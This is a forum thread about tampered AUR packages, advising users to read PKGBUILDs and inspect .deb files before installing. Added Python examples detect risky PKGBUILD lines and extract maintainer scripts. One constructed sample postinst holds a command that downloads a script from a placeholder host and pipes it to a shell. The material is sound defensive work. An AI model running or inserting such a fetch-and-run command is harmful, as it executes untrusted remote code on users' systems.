Malware in the AUR

Offline Siva

  • Staff Member
  • ********
  • Posts: 23
  • Country: 00
  • "We're all mad here"
Malware in the AUR
« on: July 12, 2018, 04:28:00 AM »
Three programs were tampered with by someone named xeactor.

Offline CwF

  • Full Member
  • ****
  • Posts: 249
  • Country: us
Re: Malware in the AUR
« Reply #1 on: July 12, 2018, 03:44:26 PM »
I continue to be put off by the "Linux is inherently safer" proponents.
Hogwash.
Nearly all issues start with a user click. Linux's are simply not a target. Like a hunter taking out a squirrel with a high powered rifle, not going to happen. When that squirrel morphs into an elk, its entire history of safety means nothing.
And who's looking for a better pdf reader?

Offline Kalthrix

  • Staff Member
  • ********
  • Posts: 1068
  • Country: us
Re: Re: Malware in the AUR
« Reply #2 on: July 12, 2018, 07:56:56 PM »
Quote from: CwF on July 12, 2018, 03:44:26 PM
I continue to be put off by the "Linux is inherently safer" proponents.
Hogwash.
Nearly all issues start with a user click. Linux's are simply not a target. Like a hunter taking out a squirrel with a high powered rifle, not going to happen. When that squirrel morphs into an elk, its entire history of safety means nothing.
And who's looking for a better pdf reader?

Honestly, the only use I have found for the older "acroread (Adobe Reader 9)" package is to display fillable PDF documents that actively refuse to display on any other PDF editor/viewer. You'll see this a lot with state, court, and federal documents. Some businesses working in realty and financial will use the same. It's irritating to say in the least. Not sure if the intent was to reach that incredibly small crowd that still use the package, to test waters to gauge reaction time from the community considering it is a rarely used package, or if the intent was to target those that prefer to use commercial software vs the open source alternatives (although old) due to familiarity.

I'll never understand people that do this. If it is just to spite others or what their actual motivation is? Why not either improve the package or make one that is better? Adobe obviously has no interest in maintaining it or we would have seen Reader or Acrobat DC brought to Linux already.

Offline fraterchaos

  • Mandelbrot Metal Mayhem!
  • Staff Member
  • ********
  • Posts: 808
  • Country: us
  • Never underestimate the power of human stupidity
    • Skype
Re: Re: Malware in the AUR
« Reply #3 on: July 12, 2018, 10:25:59 PM »
Quote from: CwF on July 12, 2018, 03:44:26 PM
I continue to be put off by the "Linux is inherently safer" proponents.
Hogwash.
Nearly all issues start with a user click. Linux's are simply not a target. Like a hunter taking out a squirrel with a high powered rifle, not going to happen. When that squirrel morphs into an elk, its entire history of safety means nothing.
And who's looking for a better pdf reader?

the one way in which linux can be safer is that being open source, it means a lot more people are going over the code that is added... so it's more likely that malware will be caught sooner. And when it's caught it is nearly always addressed more quickly than you could expect MS or Apple to do it. They only have a profit motive.

Not saying it's perfect, open source also enables more people to be able to add suspicious code from the start... but it still has a better chance of getting caught more quickly, I think.
Science, like Nature, must also be tamed... with a view towards its preservation. -- Rush

Offline CwF

  • Full Member
  • ****
  • Posts: 249
  • Country: us
Re: Re: Re: Malware in the AUR
« Reply #4 on: July 13, 2018, 02:59:10 PM »
Quote from: fraterchaos on July 12, 2018, 10:25:59 PM
... but it still has a better chance of getting caught more quickly, I think.
I think that's generally right. That's why I'm happy with apt-get stable Debian, perhaps the safest around. Once we start after the most current, or allow 'user content' or PPAs, or encourage something idiotic like Flatpaks, trust ends. Even compiling from source is suspect, like you actually reviewed the code. I did say a user click. Look how stuff is getting into Android. Once 'stable' is extended into 'want' we let our guard down.

I'm aware of the proprietary pdf stuff. It's sad the government is so stupid in its conflicts of interest. I'm still amazed some states went through the Silverlight phase. It just proves most aren't paying attention.

Since the potential audience (target) was tiny in this case I suspect a grey hat demonstration.

Offline Siva

  • Staff Member
  • ********
  • Posts: 23
  • Country: 00
  • "We're all mad here"
Re: Malware in the AUR
« Reply #5 on: July 19, 2018, 12:29:47 PM »
Flatpaks can be safer. For example OpenRA relies on Mono and Mono adds CA certs to your system.

Installing the flatpak segregates it to its own part of your system.

Offline Spatry

  • Benevolent Dictator
  • Administrator - Sysop
  • **********
  • Posts: 4975
  • Country: us
  • Cup of Linux Founder
    • Cup of Linux
Re: Malware in the AUR
« Reply #6 on: July 19, 2018, 09:18:38 PM »
I cannot stress this enough.... When using yaourt or any other AUR helper, READ THE PKGBUILD! It will tell you what sources it is downloading.... alternatively you can download the AUR snapshot to a temp directory and run makepkg against it.... then you can look into the sources before you install the compiled package to ensure you are not getting any malware.... the AUR is a magnificent tool but it can also be your undoing if you do not exercise a little CARE.

Something I did not think of: if you are installing a package with -bin in the name, odds are you are getting a blob compiled against Ubuntu, Fedora or some other distro... in those cases you do not get the source but if it contains malware there will be comments posted on the AUR page... Always a good idea to read the comments....
"Wipe that NERVOUS expression off of your face, 3PO!" -General Leia Organa SWTLJ

Offline lcRONOS

  • I will run all the Operating Systems!
  • Staff Member
  • ********
  • Posts: 751
  • Country: us
Re: Malware in the AUR
« Reply #7 on: September 14, 2018, 01:25:24 PM »
I know this is a little old, but just to add on to what Spatry said here, be mindful of which AUR helper you use (if you use one at all).
Yaourt got a lot of love back in the day, and definitely has a nice UI, but there is a security flaw with it. When it downloads a package from the AUR, it will source the PKGBUILD file before asking you if you want to see it. The problem with this is that if any malicious shell commands are inserted in the PKGBUILD, those commands will be run before you see them. I highly recommend that Yaourt fans switch to Yay (Yet Another Yogurt). As the name implies, it is influenced by Yaourt, and can be used in the same way with a similar interface. Additionally, it can use pacman-style syntax for people who prefer that. It has more features than Yaourt, and does not have that security flaw.
Laptop: HP Pavilion 15t, quadboot Obarun Linux, macOS 10.13, TrueOS, Windows 10
Desktop: Dell Inspiron 660, dualboot Artix Linux,Windows 1
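A static reader for the two things Spatry's and lcRONOS's posts care about, added here as an example and not code from any AUR helper: it lists the source=() entries without ever sourcing the file, and it reports the top-level lines that a helper which does `source PKGBUILD` to read the metadata (as yaourt did) would execute before showing you anything. The PKGBUILD is a constructed sample, and the parser assumes the usual `name() {` function style.

```python
import re
import shlex

# Constructed sample PKGBUILD (not a real AUR package). A top-level command
# has been slipped in among the variable assignments; a helper that runs
# `source PKGBUILD` to read the metadata executes it before you see the file.
SAMPLE_PKGBUILD = r"""# Maintainer: example <example@example.invalid>
pkgname=example-tool
pkgver=1.2.3
pkgrel=1
source=("https://example.invalid/example-tool-$pkgver.tar.gz"
        "http://mirror.example.invalid/extra-blob.bin")
sha256sums=('SKIP' 'SKIP')
logger "PKGBUILD was sourced"
build() {
    cd "$pkgname-$pkgver"
    make
}
"""

ASSIGN = re.compile(r"^[A-Za-z_][A-Za-z0-9_]*(\+?=|\[\d*\]=)")   # var=, var+=, var[0]=
FUNC_HEADER = re.compile(r"^[A-Za-z_][A-Za-z0-9_]*\s*\(\)\s*\{")  # assumes `name() {` style

def top_level_commands(text):
    """(line_no, line) for lines that run the moment the file is sourced:
    anything outside a function body that is not an assignment or comment."""
    hits, brace_depth, array_open = [], 0, False
    for no, raw in enumerate(text.splitlines(), 1):
        line = raw.strip()
        if brace_depth:                 # inside build()/package()/...
            brace_depth += line.count("{") - line.count("}")
        elif array_open:                # continuation of a multi-line array
            array_open = ")" not in line
        elif not line or line.startswith("#"):
            continue
        elif FUNC_HEADER.match(line):
            brace_depth = line.count("{") - line.count("}")
        elif ASSIGN.match(line):
            array_open = line.count("(") > line.count(")")
        else:
            hits.append((no, line))
    return hits

def source_entries(text):
    """Read the source=() array as text, no shell involved ($vars stay literal)."""
    m = re.search(r"^source=\((.*?)\)", text, re.M | re.S)
    return shlex.split(m.group(1)) if m else []
```

Running `top_level_commands` over a snapshot you downloaded (Spatry's temp-directory route) tells you whether reading it with a sourcing helper would have already run something.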

Offline Kueller

  • Spatry's Security Guard
  • Staff Member
  • ********
  • Posts: 324
  • Country: us
Re: Malware in the AUR
« Reply #8 on: September 14, 2018, 04:19:16 PM »
Late to this subject but "safer" is a relative term. Anything can be compromised and good safety should never be left alone. Still, Linux has proven itself to be safer beyond just catching vulnerabilities earlier due to the open source model (although that certainly helps).

The AUR is inherently an insecure source though that requires more caution on your part. Standard repositories are of course safer.

Offline swarfendor437

  • Jr. Member
  • ***
  • Posts: 59
  • Country: 00
  • Not f'd:You won't find me on facebook/social media
Re: Malware in the AUR
« Reply #9 on: November 29, 2018, 05:18:06 PM »
As stated elsewhere, a theme could wipe a drive clean: example of a theme was Ubundows on gnome-look.org which executed the unix code to wipe the GNU/Linux installation and everything with it. That's why I shared Blackwolf's (ex-Moderator on Ultimate Edition Oz forum - respect) advice on inspecting tarballs on the Zorin Forum and I also included in the Unofficial Manual I wrote for Zorin 12.x:

"h. Inspect 3rd Party .deb packages before installing: These should always be inspected before 'extracting' as whilst not a virus, malicious code could be lurking there:
 "I always open the debs and check for suspicious post-install scripts
This is how to do that. ... 
Listing the files from a debian package using dpkg -c 
dpkg is the package manager for debian. So using dpkg command you can list and extract the packages, as shown below.
To view the content of *.deb file: 
Code:
$ dpkg -c ovpc_1.06.94-3_i386.deb
dr-xr-xr-x root/root 0 2010-02-25 10:54 ./
dr-xr-xr-x root/root 0 2010-02-25 10:54 ./ovpc/
dr-xr-xr-x root/root 0 2010-02-25 10:54 ./ovpc/pkg/
dr-xr-xr-x root/root 0 2010-02-25 10:54 ./ovpc/pkg/lib/
dr-xr-xr-x root/root 0 2010-02-25 10:48 ./ovpc/pkg/lib/header/ 
-r-xr-xr-x root/root 130 2009-10-29 17:06 ./ovpc/pkg/lib/header/libov.so
.
.
.
-r-xr-xr-x root/root 131 2009-10-29 17:06 ./ovpc/pkg/etc/conf
dr-xr-xr-x root/root 0 2010-02-25 10:54 ./ovpc/pkg/etc/conf/log.conf
Extracting the files from a debian package using dpkg -x
Use dpkg -x to extract the files from a deb package as shown below.
Code:
$ dpkg -x ovpc_1.06.94-3_i386.deb /tmp/ov
$ ls /tmp/ov 
ovpc 
DEB files are ar archives, which always contain three files: debian-binary, control.tar.gz, and data.tar.gz. We can use the ar command and the tar command to extract and view the files from the deb package, as shown below.
First, extract the content of *.deb archive file using ar command.
Code: 

$ ar -vx ovpc_1.06.94-3_i386.deb
x - debian-binary
x - control.tar.gz
x - data.tar.gz 
$
Next, extract the content of data.tar.gz file as shown below.
Code:
$ tar -xvzf data.tar.gz
./
./ovpc/
./ovpc/pkg/
./ovpc/pkg/lib/
./ovpc/pkg/lib/header/ 
./ovpc/pkg/lib/header/libov.so 
.
.
./ovpc/pkg/etc/conf
./ovpc/pkg/etc/conf/log.con " [With acknowledgement to Blackwolf on ultimateeditionoz.com forum – sadly the forum is no more]. There was an instance of a GNU/Linux theme uploaded to gnome-look.org called Ubundows that had not been checked by Admin for that site; the file once extracted executed 'Unix' commands to wipe the hard drive clean of all content - YOU HAVE BEEN WARNED!"
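The quoted procedure extracts data.tar.gz, but the post-install scripts Blackwolf says to check live in control.tar.*; this added example (not Blackwolf's or the manual's code) parses the ar container in Python and pulls out preinst/postinst/prerm/postrm for review, so it also works where `ar` is not installed. The package is constructed in memory, with a postinst that reaches out to the network as the kind of step you are looking for.

```python
import io
import tarfile

def ar_members(blob):
    """Split the ar(1) container every .deb is: '!<arch>\\n', then 60-byte headers."""
    assert blob[:8] == b"!<arch>\n", "not an ar archive"
    members, pos = {}, 8
    while pos + 60 <= len(blob):
        name = blob[pos:pos + 16].decode().rstrip(" /")   # GNU ar may append '/'
        size = int(blob[pos + 48:pos + 58].decode())
        members[name] = blob[pos + 60:pos + 60 + size]
        pos += 60 + size + (size % 2)                     # data padded to even length
    return members

def maintainer_scripts(deb_bytes):
    """{script name: text} for preinst/postinst/prerm/postrm found in control.tar.*"""
    members, scripts = ar_members(deb_bytes), {}
    control = next(v for k, v in members.items() if k.startswith("control.tar"))
    with tarfile.open(fileobj=io.BytesIO(control), mode="r:*") as tar:  # gz or xz
        for m in tar.getmembers():
            name = m.name.lstrip("./")
            if m.isfile() and name in {"preinst", "postinst", "prerm", "postrm"}:
                scripts[name] = tar.extractfile(m).read().decode()
    return scripts

def _tar_gz(files):
    buf = io.BytesIO()  # constructed helper: gzip tarball from {path: bytes}
    with tarfile.open(fileobj=buf, mode="w:gz") as tar:
        for path, data in files.items():
            info = tarfile.TarInfo(path)
            info.size = len(data)
            tar.addfile(info, io.BytesIO(data))
    return buf.getvalue()

def _ar(members):
    out = b"!<arch>\n"  # constructed helper: minimal ar writer in dpkg-deb's layout
    for name, data in members:
        out += f"{name:<16}{0:<12}{0:<6}{0:<6}{100644:<8}{len(data):<10}`\n".encode()
        out += data + (b"\n" if len(data) % 2 else b"")
    return out

SAMPLE_DEB = _ar([  # constructed sample package, not a real upload
    ("debian-binary", b"2.0\n"),
    ("control.tar.gz", _tar_gz({
        "./control": b"Package: demo\nVersion: 1.0\nArchitecture: all\n",
        "./postinst": b"#!/bin/sh\nset -e\nwget -qO- http://example.invalid/extra.sh | sh\n",
    })),
    ("data.tar.gz", _tar_gz({"./usr/share/demo/README": b"demo\n"})),
])
```

Print the returned scripts before `dpkg -i`; a postinst that does more than configure the files `dpkg -c` listed is exactly what the advice above is about.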